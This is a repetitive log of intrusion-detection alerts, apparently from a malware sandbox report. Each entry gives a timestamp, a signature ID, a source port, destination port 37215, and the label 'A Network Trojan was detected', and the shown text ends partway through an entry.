              Timestamp:05/24/24-10:59:10.700418
              SID:2829579
              Source Port:51852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.284251
              SID:2835222
              Source Port:38628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.485930
              SID:2835222
              Source Port:53106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575364
              SID:2835222
              Source Port:47108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.920659
              SID:2829579
              Source Port:50834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.343669
              SID:2829579
              Source Port:53810
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055379
              SID:2835222
              Source Port:52752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.967366
              SID:2835222
              Source Port:56416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.110879
              SID:2829579
              Source Port:47762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.108691
              SID:2829579
              Source Port:60302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.582530
              SID:2829579
              Source Port:48336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.585032
              SID:2829579
              Source Port:35570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.495438
              SID:2829579
              Source Port:52364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.109579
              SID:2829579
              Source Port:34646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.430615
              SID:2829579
              Source Port:34536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.402282
              SID:2835222
              Source Port:35800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.424097
              SID:2829579
              Source Port:41092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.382881
              SID:2829579
              Source Port:56204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.040720
              SID:2829579
              Source Port:35538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396094
              SID:2835222
              Source Port:43092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727059
              SID:2829579
              Source Port:55406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.231726
              SID:2835222
              Source Port:41538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537977
              SID:2829579
              Source Port:44790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.286853
              SID:2835222
              Source Port:48420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.102303
              SID:2835222
              Source Port:32918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.234422
              SID:2829579
              Source Port:33802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.404464
              SID:2835222
              Source Port:56450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.833008
              SID:2835222
              Source Port:43932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.077626
              SID:2829579
              Source Port:55914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.494407
              SID:2835222
              Source Port:57840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.045055
              SID:2829579
              Source Port:36274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.334252
              SID:2829579
              Source Port:41502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.752717
              SID:2829579
              Source Port:35634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726788
              SID:2835222
              Source Port:56042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.048987
              SID:2829579
              Source Port:57914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.860094
              SID:2835222
              Source Port:57722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.282805
              SID:2829579
              Source Port:38870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.343039
              SID:2829579
              Source Port:47656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.377668
              SID:2835222
              Source Port:60920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.346983
              SID:2829579
              Source Port:44822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.594790
              SID:2829579
              Source Port:37098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.480605
              SID:2829579
              Source Port:50278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118463
              SID:2829579
              Source Port:48808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.664544
              SID:2829579
              Source Port:40922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.598050
              SID:2829579
              Source Port:53618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.267759
              SID:2829579
              Source Port:58344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.125502
              SID:2829579
              Source Port:53506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.928729
              SID:2829579
              Source Port:51664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.053899
              SID:2829579
              Source Port:49060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.099667
              SID:2835222
              Source Port:48190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.705416
              SID:2835222
              Source Port:33914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725714
              SID:2835222
              Source Port:44232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.828481
              SID:2835222
              Source Port:56258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.340832
              SID:2829579
              Source Port:52786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.425913
              SID:2829579
              Source Port:34084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.111912
              SID:2829579
              Source Port:55232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.572615
              SID:2835222
              Source Port:45428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.463082
              SID:2835222
              Source Port:44068
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.111983
              SID:2829579
              Source Port:40402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.445492
              SID:2829579
              Source Port:49872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.486160
              SID:2829579
              Source Port:59706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.885856
              SID:2835222
              Source Port:45388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574749
              SID:2835222
              Source Port:47200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.474738
              SID:2829579
              Source Port:36416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.048953
              SID:2829579
              Source Port:42898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098203
              SID:2835222
              Source Port:48870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.271160
              SID:2829579
              Source Port:53374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.578808
              SID:2835222
              Source Port:39348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.146982
              SID:2835222
              Source Port:39408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.868556
              SID:2829579
              Source Port:42336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.970912
              SID:2835222
              Source Port:54538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.586077
              SID:2835222
              Source Port:35470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.573903
              SID:2835222
              Source Port:37908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.101638
              SID:2835222
              Source Port:42982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.079761
              SID:2829579
              Source Port:43962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638035
              SID:2835222
              Source Port:51864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.492368
              SID:2829579
              Source Port:46592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.103701
              SID:2829579
              Source Port:43576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.077978
              SID:2835222
              Source Port:43564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.544180
              SID:2829579
              Source Port:39156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857856
              SID:2829579
              Source Port:58028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.246099
              SID:2829579
              Source Port:55686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.348099
              SID:2835222
              Source Port:56298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.280117
              SID:2829579
              Source Port:48806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.823606
              SID:2835222
              Source Port:36478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.507287
              SID:2829579
              Source Port:44942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.554134
              SID:2835222
              Source Port:54278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.361296
              SID:2829579
              Source Port:33000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.923741
              SID:2829579
              Source Port:47644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118335
              SID:2829579
              Source Port:54318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.538235
              SID:2835222
              Source Port:49602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624777
              SID:2829579
              Source Port:56494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.450566
              SID:2835222
              Source Port:42316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638177
              SID:2829579
              Source Port:43900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.162402
              SID:2835222
              Source Port:43696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575149
              SID:2829579
              Source Port:42598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482905
              SID:2829579
              Source Port:52510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432238
              SID:2829579
              Source Port:34720
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.421574
              SID:2835222
              Source Port:53366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188102
              SID:2835222
              Source Port:37628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.636016
              SID:2829579
              Source Port:53900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.630747
              SID:2829579
              Source Port:44780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.361313
              SID:2829579
              Source Port:59190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725692
              SID:2835222
              Source Port:46370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.458019
              SID:2829579
              Source Port:36568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.458411
              SID:2829579
              Source Port:46216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.099259
              SID:2829579
              Source Port:47912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.979736
              SID:2829579
              Source Port:56176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.044703
              SID:2829579
              Source Port:60738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.428202
              SID:2829579
              Source Port:54342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.441364
              SID:2829579
              Source Port:44304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.430721
              SID:2835222
              Source Port:49246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.204763
              SID:2829579
              Source Port:51776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.859548
              SID:2835222
              Source Port:57520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.078677
              SID:2835222
              Source Port:32884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.530800
              SID:2835222
              Source Port:37938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575489
              SID:2835222
              Source Port:48578
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.422325
              SID:2829579
              Source Port:38076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.421560
              SID:2835222
              Source Port:46782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.458308
              SID:2835222
              Source Port:35652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.598465
              SID:2835222
              Source Port:35844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.635796
              SID:2829579
              Source Port:34052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.689594
              SID:2835222
              Source Port:51936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.374798
              SID:2835222
              Source Port:37536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.530912
              SID:2829579
              Source Port:44234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.582529
              SID:2829579
              Source Port:51896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638184
              SID:2835222
              Source Port:48944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725683
              SID:2829579
              Source Port:59964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575170
              SID:2829579
              Source Port:58206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.773267
              SID:2829579
              Source Port:39166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.548541
              SID:2835222
              Source Port:57938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.621583
              SID:2829579
              Source Port:60740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575180
              SID:2829579
              Source Port:46414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.394086
              SID:2835222
              Source Port:46602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.447933
              SID:2829579
              Source Port:36076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.491822
              SID:2835222
              Source Port:35896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.579323
              SID:2835222
              Source Port:43662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.641024
              SID:2835222
              Source Port:44948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.859519
              SID:2829579
              Source Port:55694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.982266
              SID:2829579
              Source Port:45556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.550549
              SID:2829579
              Source Port:57038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341355
              SID:2829579
              Source Port:42616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.398242
              SID:2835222
              Source Port:45246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.480141
              SID:2835222
              Source Port:51514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482364
              SID:2829579
              Source Port:33012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.327816
              SID:2835222
              Source Port:49136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.345278
              SID:2829579
              Source Port:53592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.546385
              SID:2829579
              Source Port:38304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.694761
              SID:2829579
              Source Port:34020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.346990
              SID:2835222
              Source Port:46088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.979412
              SID:2829579
              Source Port:39494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625244
              SID:2835222
              Source Port:56494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.457809
              SID:2835222
              Source Port:34372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536713
              SID:2829579
              Source Port:33120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727629
              SID:2829579
              Source Port:48992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.364401
              SID:2835222
              Source Port:48598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725737
              SID:2835222
              Source Port:46792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.374671
              SID:2829579
              Source Port:36104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432505
              SID:2835222
              Source Port:32832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.467858
              SID:2835222
              Source Port:35550
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118463
              SID:2829579
              Source Port:56302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.113711
              SID:2835222
              Source Port:59864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638517
              SID:2829579
              Source Port:44232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.763323
              SID:2829579
              Source Port:40740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.764966
              SID:2829579
              Source Port:40504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.703507
              SID:2829579
              Source Port:50064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.252715
              SID:2835222
              Source Port:33504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.696962
              SID:2829579
              Source Port:54326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.428800
              SID:2829579
              Source Port:42818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.364539
              SID:2835222
              Source Port:50272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.695197
              SID:2829579
              Source Port:45688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100742
              SID:2835222
              Source Port:54752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.446314
              SID:2829579
              Source Port:36872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.189499
              SID:2835222
              Source Port:52882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.308507
              SID:2835222
              Source Port:58766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.204659
              SID:2835222
              Source Port:59404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.801771
              SID:2835222
              Source Port:42354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.286824
              SID:2829579
              Source Port:59134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.483147
              SID:2829579
              Source Port:58300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.606314
              SID:2829579
              Source Port:41672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099724
              SID:2829579
              Source Port:60442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.491564
              SID:2829579
              Source Port:60520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857421
              SID:2835222
              Source Port:34326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.281631
              SID:2829579
              Source Port:44802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.168077
              SID:2835222
              Source Port:39600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726410
              SID:2829579
              Source Port:54842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.265785
              SID:2835222
              Source Port:59922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.980860
              SID:2829579
              Source Port:44616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459098
              SID:2835222
              Source Port:35078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459820
              SID:2835222
              Source Port:57228
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118427
              SID:2835222
              Source Port:52764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.704917
              SID:2835222
              Source Port:39860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.637940
              SID:2835222
              Source Port:39844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.570556
              SID:2829579
              Source Port:57260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.579909
              SID:2835222
              Source Port:36988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186510
              SID:2829579
              Source Port:35668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.871991
              SID:2829579
              Source Port:41272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.102265
